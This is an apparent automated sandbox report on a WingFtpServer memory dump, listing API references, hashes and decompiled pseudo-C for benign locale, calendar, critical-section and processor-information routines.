                                                                                                                                                                                                  0x03ac5a30
                                                                                                                                                                                                  0x03ac5a41
                                                                                                                                                                                                  0x03ac5a5a
                                                                                                                                                                                                  0x03ac5a43
                                                                                                                                                                                                  0x03ac5a4b
                                                                                                                                                                                                  0x03ac5a4b
                                                                                                                                                                                                  0x03ac5a41
                                                                                                                                                                                                  0x03ac5a5f
                                                                                                                                                                                                  0x03ac5a62
                                                                                                                                                                                                  0x03ac5a65
                                                                                                                                                                                                  0x03ac5a6a
                                                                                                                                                                                                  0x03ac5a75
                                                                                                                                                                                                  0x03ac5a7a
                                                                                                                                                                                                  0x03ac5a7d
                                                                                                                                                                                                  0x03ac5a80
                                                                                                                                                                                                  0x03ac5a85
                                                                                                                                                                                                  0x03ac5a90
                                                                                                                                                                                                  0x03ac5aa5
                                                                                                                                                                                                  0x03ac5aa9
                                                                                                                                                                                                  0x03ac5ab4
                                                                                                                                                                                                  0x03ac5ab7
                                                                                                                                                                                                  0x03ac5aba
                                                                                                                                                                                                  0x03ac5acc

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001,00000000,03AC5ACD,?,?,?,?,00000000,00000000), ref: 03AC580F
                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000001,00000000,03AC5ACD,?,?,?,?,00000000,00000000), ref: 03AC5818
                                                                                                                                                                                                    • Part of subcall function 03AC57BC: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,03AC58BE,?,00000001,00000000,03AC5ACD), ref: 03AC57CF
                                                                                                                                                                                                    • Part of subcall function 03AC5770: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 03AC578E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale$Info$ThreadValid
                                                                                                                                                                                                  • String ID: AMPM$2$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                  • API String ID: 233154393-3379564615
                                                                                                                                                                                                  • Opcode ID: c98b736d96ea9d9191aba0ca9e573f3150d6b9cb928ec38c8e05422bf8cdec6c
                                                                                                                                                                                                  • Instruction ID: befade0f1ab600e3469ff327232ff76480f0c4eeabe416b3bc4a51e311ebcdd3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c98b736d96ea9d9191aba0ca9e573f3150d6b9cb928ec38c8e05422bf8cdec6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50718939B1068D9BDB05EBAAD980A9F73AAEF46700F50806FF5009F345DB34ED068765
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC61F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 194threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                                  			E03AC61F0(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				intOrPtr _t33;
				signed int _t49;
				signed int _t53;
				signed int _t56;
				intOrPtr _t58;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x3ac6485);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x3bd2274; // 0x3bd38fc
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E03AA6FEC(0x1a);
				}
				_t33 =  *0x3bd6834; // 0x3ec8830
				E03AA8728(E03AA89AC(_t33, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x3ac6468);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x3bd682c = 0;
				_push(0);
				E03AAC140();
				_t142 = _t141 + 4;
				E03AC5770(_t93, 0x3ac64a0, 0x100b,  &_v12);
				_t127 = E03AC1148(0x3ac64a0, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x3bd682c = 1;
						_push(1);
						E03AAC140();
						_t142 = _t142 + 4;
						_t68 =  *0x3bd6830; // 0x0
						E03AA9FFC(_t68, L"B.C.");
						_t70 =  *0x3bd6830; // 0x0
						 *((intOrPtr*)(_t70 + 4)) = 0;
						_t71 =  *0x3bd6830; // 0x0
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E03AC38DC(1, 1, 1, __eflags, _t161);
						_v20 = E03AA755C();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						_t75 =  *0x3bd6830; // 0x0
						 *((long long*)(_t75 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E03AC60C8, GetThreadLocale(), _t127, 4);
						_t78 =  *0x3bd6830; // 0x0
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								_t124 =  *0x3bd6830; // 0x0
								 *((intOrPtr*)(_t124 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E03AC6160, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E03AC60C8, GetThreadLocale(), _t127, 4);
					_t85 =  *0x3bd6830; // 0x0
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							_t125 =  *0x3bd6830; // 0x0
							 *((intOrPtr*)(_t125 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E03AC6160, GetThreadLocale(), _t127, 3);
				}
				_t49 =  *0x3bd6830; // 0x0
				_t94 = _t49;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E03AAC140();
				_t53 =  *0x3bd6830; // 0x0
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t118 =  *0x3bd6830; // 0x0
						_t106 =  *0x3abbc98; // 0x3abbc9c
						E03AAB38C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106, _t118 + (_t95 + _t95 * 2) * 8, _t161);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x3ac6024; // 0x3ac6028
				E03AAC264(0x3bd6830, _t116);
				_t56 =  *0x3bd6830; // 0x0
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x3bd682c = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x3ac646f);
				_t58 =  *0x3bd6834; // 0x3ec8830
				return E03AA8908(_t58, _t105, _t127);
			}











































                                                                                                                                                                                                  0x03ac61f0
                                                                                                                                                                                                  0x03ac61f0
                                                                                                                                                                                                  0x03ac61f0
                                                                                                                                                                                                  0x03ac61f1
                                                                                                                                                                                                  0x03ac61f3
                                                                                                                                                                                                  0x03ac61f8
                                                                                                                                                                                                  0x03ac61fb
                                                                                                                                                                                                  0x03ac61fe
                                                                                                                                                                                                  0x03ac6201
                                                                                                                                                                                                  0x03ac6205
                                                                                                                                                                                                  0x03ac6206
                                                                                                                                                                                                  0x03ac620b
                                                                                                                                                                                                  0x03ac620e
                                                                                                                                                                                                  0x03ac6211
                                                                                                                                                                                                  0x03ac6216
                                                                                                                                                                                                  0x03ac6219
                                                                                                                                                                                                  0x03ac621d
                                                                                                                                                                                                  0x03ac621d
                                                                                                                                                                                                  0x03ac6222
                                                                                                                                                                                                  0x03ac622f
                                                                                                                                                                                                  0x03ac6236
                                                                                                                                                                                                  0x03ac6237
                                                                                                                                                                                                  0x03ac623c
                                                                                                                                                                                                  0x03ac623f
                                                                                                                                                                                                  0x03ac6244
                                                                                                                                                                                                  0x03ac624a
                                                                                                                                                                                                  0x03ac625b
                                                                                                                                                                                                  0x03ac6260
                                                                                                                                                                                                  0x03ac6273
                                                                                                                                                                                                  0x03ac6285
                                                                                                                                                                                                  0x03ac628f
                                                                                                                                                                                                  0x03ac62ec
                                                                                                                                                                                                  0x03ac62ef
                                                                                                                                                                                                  0x03ac62fa
                                                                                                                                                                                                  0x03ac6300
                                                                                                                                                                                                  0x03ac6311
                                                                                                                                                                                                  0x03ac6316
                                                                                                                                                                                                  0x03ac6319
                                                                                                                                                                                                  0x03ac6323
                                                                                                                                                                                                  0x03ac6328
                                                                                                                                                                                                  0x03ac632f
                                                                                                                                                                                                  0x03ac6332
                                                                                                                                                                                                  0x03ac6337
                                                                                                                                                                                                  0x03ac633e
                                                                                                                                                                                                  0x03ac6351
                                                                                                                                                                                                  0x03ac635b
                                                                                                                                                                                                  0x03ac635e
                                                                                                                                                                                                  0x03ac6361
                                                                                                                                                                                                  0x03ac6364
                                                                                                                                                                                                  0x03ac6369
                                                                                                                                                                                                  0x03ac636c
                                                                                                                                                                                                  0x03ac637b
                                                                                                                                                                                                  0x03ac6380
                                                                                                                                                                                                  0x03ac6385
                                                                                                                                                                                                  0x03ac6387
                                                                                                                                                                                                  0x03ac6389
                                                                                                                                                                                                  0x03ac6389
                                                                                                                                                                                                  0x03ac638c
                                                                                                                                                                                                  0x03ac638c
                                                                                                                                                                                                  0x03ac6390
                                                                                                                                                                                                  0x03ac6391
                                                                                                                                                                                                  0x03ac6393
                                                                                                                                                                                                  0x03ac6395
                                                                                                                                                                                                  0x03ac639a
                                                                                                                                                                                                  0x03ac639d
                                                                                                                                                                                                  0x03ac63a3
                                                                                                                                                                                                  0x03ac63ab
                                                                                                                                                                                                  0x03ac63ac
                                                                                                                                                                                                  0x03ac63ac
                                                                                                                                                                                                  0x03ac63ac
                                                                                                                                                                                                  0x03ac639a
                                                                                                                                                                                                  0x03ac63bd
                                                                                                                                                                                                  0x03ac63bd
                                                                                                                                                                                                  0x03ac6291
                                                                                                                                                                                                  0x03ac629f
                                                                                                                                                                                                  0x03ac62a4
                                                                                                                                                                                                  0x03ac62ab
                                                                                                                                                                                                  0x03ac62b0
                                                                                                                                                                                                  0x03ac62b0
                                                                                                                                                                                                  0x03ac62b4
                                                                                                                                                                                                  0x03ac62b7
                                                                                                                                                                                                  0x03ac62b9
                                                                                                                                                                                                  0x03ac62ba
                                                                                                                                                                                                  0x03ac62bc
                                                                                                                                                                                                  0x03ac62bf
                                                                                                                                                                                                  0x03ac62c5
                                                                                                                                                                                                  0x03ac62cd
                                                                                                                                                                                                  0x03ac62ce
                                                                                                                                                                                                  0x03ac62ce
                                                                                                                                                                                                  0x03ac62bc
                                                                                                                                                                                                  0x03ac62df
                                                                                                                                                                                                  0x03ac62df
                                                                                                                                                                                                  0x03ac63c2
                                                                                                                                                                                                  0x03ac63c7
                                                                                                                                                                                                  0x03ac63cb
                                                                                                                                                                                                  0x03ac63d0
                                                                                                                                                                                                  0x03ac63d0
                                                                                                                                                                                                  0x03ac63d2
                                                                                                                                                                                                  0x03ac63e6
                                                                                                                                                                                                  0x03ac63ee
                                                                                                                                                                                                  0x03ac63f5
                                                                                                                                                                                                  0x03ac63fa
                                                                                                                                                                                                  0x03ac63fa
                                                                                                                                                                                                  0x03ac63fe
                                                                                                                                                                                                  0x03ac6401
                                                                                                                                                                                                  0x03ac6403
                                                                                                                                                                                                  0x03ac6404
                                                                                                                                                                                                  0x03ac6406
                                                                                                                                                                                                  0x03ac6406
                                                                                                                                                                                                  0x03ac6415
                                                                                                                                                                                                  0x03ac641e
                                                                                                                                                                                                  0x03ac6424
                                                                                                                                                                                                  0x03ac6429
                                                                                                                                                                                                  0x03ac642a
                                                                                                                                                                                                  0x03ac642a
                                                                                                                                                                                                  0x03ac6406
                                                                                                                                                                                                  0x03ac6432
                                                                                                                                                                                                  0x03ac6438
                                                                                                                                                                                                  0x03ac643d
                                                                                                                                                                                                  0x03ac6444
                                                                                                                                                                                                  0x03ac6449
                                                                                                                                                                                                  0x03ac6449
                                                                                                                                                                                                  0x03ac644b
                                                                                                                                                                                                  0x03ac6452
                                                                                                                                                                                                  0x03ac6454
                                                                                                                                                                                                  0x03ac6455
                                                                                                                                                                                                  0x03ac6458
                                                                                                                                                                                                  0x03ac645d
                                                                                                                                                                                                  0x03ac6467

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004), ref: 03AC6294
                                                                                                                                                                                                  • EnumCalendarInfoW.KERNEL32(03AC60C8,00000000,00000000,00000004), ref: 03AC629F
                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,03AC60C8,00000000,00000000,00000004), ref: 03AC62D4
                                                                                                                                                                                                  • EnumCalendarInfoW.KERNEL32(03AC6160,00000000,00000000,00000003,03AC60C8,00000000,00000000,00000004), ref: 03AC62DF
                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004), ref: 03AC6370
                                                                                                                                                                                                  • EnumCalendarInfoW.KERNEL32(03AC60C8,00000000,00000000,00000004), ref: 03AC637B
                                                                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,03AC60C8,00000000,00000000,00000004), ref: 03AC63B2
                                                                                                                                                                                                  • EnumCalendarInfoW.KERNEL32(03AC6160,00000000,00000000,00000003,03AC60C8,00000000,00000000,00000004), ref: 03AC63BD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CalendarEnumInfoLocaleThread
                                                                                                                                                                                                  • String ID: B.C.
                                                                                                                                                                                                  • API String ID: 683597275-621294921
                                                                                                                                                                                                  • Opcode ID: 3a925a4ba2e02c410dddd56ff22346231f96230c1d1786f84e3907970a79b756
                                                                                                                                                                                                  • Instruction ID: 0db15d372e5525b23a18f7b9ae8f50d39a1e4e356d5ac3e58d8ef937b47cccad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a925a4ba2e02c410dddd56ff22346231f96230c1d1786f84e3907970a79b756
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1461E279A11B809FD710FF6CDA90B6A37A9FB48714B48426BE910DF769D732D801CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AACD24 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                                  			E03AACD24(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x3aace28);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x3bd5c14);
				if(_t28 !=  *0x3bd5c2c) {
					LeaveCriticalSection(0x3bd5c14);
					E03AA9C1C(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x3bd5c10 == 0) {
							_t18 = E03AACA0C(_t28, _t28, _t44, __edi, _t44);
							L03AA51C4();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E03AAAAF4(_t44, 0x3aace40);
								}
								L03AA51C4();
								E03AACA0C(_t18, _t28,  &_v8, _t42, _t44);
								E03AAAAF4(_t44, _v8);
							}
						} else {
							E03AACC08(_t28, _t44);
						}
					}
					EnterCriticalSection(0x3bd5c14);
					 *0x3bd5c2c = _t28;
					E03AAC88C(0x3bd5c2e, E03AAA8E4( *_t44), 0xaa);
					LeaveCriticalSection(0x3bd5c14);
				} else {
					E03AAA99C(_t44, 0x55, 0x3bd5c2e);
					LeaveCriticalSection(0x3bd5c14);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E03AACE2F);
				return E03AA9C1C( &_v8);
			}









                                                                                                                                                                                                  0x03aacd24
                                                                                                                                                                                                  0x03aacd27
                                                                                                                                                                                                  0x03aacd29
                                                                                                                                                                                                  0x03aacd2a
                                                                                                                                                                                                  0x03aacd2b
                                                                                                                                                                                                  0x03aacd2d
                                                                                                                                                                                                  0x03aacd31
                                                                                                                                                                                                  0x03aacd32
                                                                                                                                                                                                  0x03aacd37
                                                                                                                                                                                                  0x03aacd3a
                                                                                                                                                                                                  0x03aacd42
                                                                                                                                                                                                  0x03aacd4e
                                                                                                                                                                                                  0x03aacd75
                                                                                                                                                                                                  0x03aacd7c
                                                                                                                                                                                                  0x03aacd8e
                                                                                                                                                                                                  0x03aacd97
                                                                                                                                                                                                  0x03aacda8
                                                                                                                                                                                                  0x03aacdad
                                                                                                                                                                                                  0x03aacdb5
                                                                                                                                                                                                  0x03aacdba
                                                                                                                                                                                                  0x03aacdc3
                                                                                                                                                                                                  0x03aacdc3
                                                                                                                                                                                                  0x03aacdc8
                                                                                                                                                                                                  0x03aacdd0
                                                                                                                                                                                                  0x03aacdda
                                                                                                                                                                                                  0x03aacdda
                                                                                                                                                                                                  0x03aacd99
                                                                                                                                                                                                  0x03aacd9d
                                                                                                                                                                                                  0x03aacd9d
                                                                                                                                                                                                  0x03aacd97
                                                                                                                                                                                                  0x03aacde4
                                                                                                                                                                                                  0x03aacde9
                                                                                                                                                                                                  0x03aace03
                                                                                                                                                                                                  0x03aace0d
                                                                                                                                                                                                  0x03aacd50
                                                                                                                                                                                                  0x03aacd5c
                                                                                                                                                                                                  0x03aacd66
                                                                                                                                                                                                  0x03aacd66
                                                                                                                                                                                                  0x03aace14
                                                                                                                                                                                                  0x03aace17
                                                                                                                                                                                                  0x03aace1a
                                                                                                                                                                                                  0x03aace27

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(03BD5C14,00000000,03AACE28,?,?,?,00000000,?,03AAD708,00000000,03AAD767,?,?,00000000,00000000,00000000), ref: 03AACD42
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(03BD5C14,03BD5C14,00000000,03AACE28,?,?,?,00000000,?,03AAD708,00000000,03AAD767,?,?,00000000,00000000), ref: 03AACD66
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(03BD5C14,03BD5C14,00000000,03AACE28,?,?,?,00000000,?,03AAD708,00000000,03AAD767,?,?,00000000,00000000), ref: 03AACD75
                                                                                                                                                                                                  • IsValidLocale.KERNEL32(00000000,00000002,03BD5C14,03BD5C14,00000000,03AACE28,?,?,?,00000000,?,03AAD708,00000000,03AAD767), ref: 03AACD87
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(03BD5C14,00000000,00000002,03BD5C14,03BD5C14,00000000,03AACE28,?,?,?,00000000,?,03AAD708,00000000,03AAD767), ref: 03AACDE4
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(03BD5C14,03BD5C14,00000000,00000002,03BD5C14,03BD5C14,00000000,03AACE28,?,?,?,00000000,?,03AAD708,00000000,03AAD767), ref: 03AACE0D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                                                                                                                                  • String ID: en-US,en,
                                                                                                                                                                                                  • API String ID: 975949045-3579323720
                                                                                                                                                                                                  • Opcode ID: ea676d7a24d45cf19a1d0387cd581c8841fbcef263bf182b31cd01220b7fc91d
                                                                                                                                                                                                  • Instruction ID: afb244e56e4b0710274a391f77ee40b432ecaeea7ff4cd1001262d251a259abe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea676d7a24d45cf19a1d0387cd581c8841fbcef263bf182b31cd01220b7fc91d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA21AE2BB44F446EEA21F77C8A41A2E36D49B46A14B584477A040DF355EBB48D84C366
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA84A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 36%
                                                                                                                                                                                                  			E03AA84A0(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L9:
					_v8 = 0x40;
					goto L10;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L03AA528C();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L9;
					} else {
						_v12 = E03AA6E90(_v16);
						_push(_t41);
						_push(E03AA854E);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L03AA528C();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E03AA8555);
							return E03AA6EAC(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L11;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E03AA938C();
							L10:
							return _v8;
						}
					}
				}
				L11:
			}












                                                                                                                                                                                                  0x03aa84a1
                                                                                                                                                                                                  0x03aa84a3
                                                                                                                                                                                                  0x03aa84a8
                                                                                                                                                                                                  0x03aa84c2
                                                                                                                                                                                                  0x03aa8555
                                                                                                                                                                                                  0x03aa8555
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa84c8
                                                                                                                                                                                                  0x03aa84c8
                                                                                                                                                                                                  0x03aa84cb
                                                                                                                                                                                                  0x03aa84cc
                                                                                                                                                                                                  0x03aa84ce
                                                                                                                                                                                                  0x03aa84d5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa84e1
                                                                                                                                                                                                  0x03aa84e9
                                                                                                                                                                                                  0x03aa84ee
                                                                                                                                                                                                  0x03aa84ef
                                                                                                                                                                                                  0x03aa84f4
                                                                                                                                                                                                  0x03aa84f7
                                                                                                                                                                                                  0x03aa84fd
                                                                                                                                                                                                  0x03aa8501
                                                                                                                                                                                                  0x03aa8502
                                                                                                                                                                                                  0x03aa8507
                                                                                                                                                                                                  0x03aa850e
                                                                                                                                                                                                  0x03aa8538
                                                                                                                                                                                                  0x03aa853a
                                                                                                                                                                                                  0x03aa853d
                                                                                                                                                                                                  0x03aa8540
                                                                                                                                                                                                  0x03aa854d
                                                                                                                                                                                                  0x03aa8510
                                                                                                                                                                                                  0x03aa8510
                                                                                                                                                                                                  0x03aa852b
                                                                                                                                                                                                  0x03aa852e
                                                                                                                                                                                                  0x03aa8536
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8536
                                                                                                                                                                                                  0x03aa8521
                                                                                                                                                                                                  0x03aa8524
                                                                                                                                                                                                  0x03aa855c
                                                                                                                                                                                                  0x03aa8562
                                                                                                                                                                                                  0x03aa8562
                                                                                                                                                                                                  0x03aa850e
                                                                                                                                                                                                  0x03aa84d5
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 03AA84B5
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 03AA84BB
